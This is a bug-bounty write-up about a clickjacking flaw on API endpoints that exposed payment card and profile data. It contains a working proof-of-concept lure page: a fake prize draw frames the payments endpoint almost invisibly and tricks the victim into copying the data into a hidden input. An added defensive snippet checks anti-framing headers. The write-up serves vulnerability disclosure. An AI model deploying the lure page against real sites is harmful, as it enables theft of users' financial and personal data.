$1800 worth Clickjacking
In this writeup, I will talk about how I earned a total of $1800 by exploiting Clickjacking on pages that disclosed sensitive user information. It was a private program on Bugcrowd.
There were some API endpoints that disclosed user information such as credit card data, email, name, phone, address, user ID, etc.:
https://example.com/api/v1/wallet/payments?language=en
https://example.com/api/v1/profile/personal
https://example.com/api/v1/wallet/address/shipping
https://www.example.com/no-cache/profileSystem/getProfile
Since none of these endpoints sent an X-Frame-Options header, I was able to load them in an iframe.
Next I had to create an HTML page that tricks the user into copying their own information out of the frame and pasting it into a field I control. So I created the following HTML page.
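The root cause above is a response that carries no anti-framing header. As an added example (not part of the original writeup), the function below classifies a response's framing policy from its headers and shows the hardened header set that would have stopped this; the header objects are constructed samples, not captured responses.

```javascript
// Extract the frame-ancestors source list from a CSP header; null if absent.
function frameAncestors(csp) {
  if (!csp) return null;
  for (const directive of csp.split(";")) {
    const tokens = directive.trim().split(/\s+/);
    if (tokens[0].toLowerCase() === "frame-ancestors") {
      return tokens.slice(1).map((t) => t.toLowerCase());
    }
  }
  return null;
}

// Returns "frameable" (any origin can iframe the response), "same-origin-only",
// "allow-listed" (explicit list of origins) or "denied".
function framingPolicy(headers) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = v;

  // Browsers that support CSP ignore X-Frame-Options when frame-ancestors is present,
  // so the CSP directive is evaluated first.
  const fa = frameAncestors(h["content-security-policy"]);
  if (fa !== null) {
    if (fa.length === 0 || fa.includes("'none'")) return "denied";
    if (fa.includes("*")) return "frameable";
    if (fa.length === 1 && fa[0] === "'self'") return "same-origin-only";
    return "allow-listed";
  }
  const xfo = (h["x-frame-options"] || "").trim().toUpperCase();
  if (xfo === "DENY") return "denied";
  if (xfo === "SAMEORIGIN") return "same-origin-only";
  // No header at all, or a value current browsers do not honour (e.g. ALLOW-FROM).
  return "frameable";
}

// Hardened header set for JSON API responses like the ones in the writeup:
// they are fetched by the site's own scripts and never need to render in a frame.
function withAntiFramingHeaders(headers) {
  return {
    ...headers,
    "X-Frame-Options": "DENY",
    "Content-Security-Policy": "frame-ancestors 'none'",
  };
}

// Constructed sample of what the vulnerable endpoint's response headers looked like.
const vulnerableResponseHeaders = { "Content-Type": "application/json" };

console.log(framingPolicy(vulnerableResponseHeaders));                          // frameable
console.log(framingPolicy(withAntiFramingHeaders(vulnerableResponseHeaders)));  // denied
```

The same check can be run over a real response by passing the result of `Object.fromEntries(response.headers)` from `fetch()`.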
HTML CODE
<!DOCTYPE html>
<html>
<head>
<title></title>
</head>
<body><div id="parent">
<center><h1 style="color: blue; text-decoration: underline;">Lucky Draw to Win $100</h1></center>
<h3>Click inside the box and Press CTRL+A then CTRL+C</h3>
<div style="border: 2px solid gray;">
<!-- The vulnerable endpoint is framed almost invisibly; the victim selects and copies its content -->
<iframe src="https://example.com/api/v1/wallet/payments?language=en" width="100%" style="opacity: 0.01"></iframe></div>
<h3>Click inside the box and press CTRL+V</h3>
<input type="password" name="" size="1">
<!-- <textarea rows="1" cols="1" style="resize: none;"></textarea> -->
<br>
<button id="btn">Click to Win</button></div>
<script>
// The pasted (copied) frame content is read from the attacker-controlled input
document.querySelector("#btn").onclick = function() {
console.log(document.querySelector("input").value)
alert("Congratulation! You have won $100")
}
</script>
</body></html>
After the user performs these steps and clicks the button, the information they pasted is logged to the console.
So that was it, Thank you for Reading.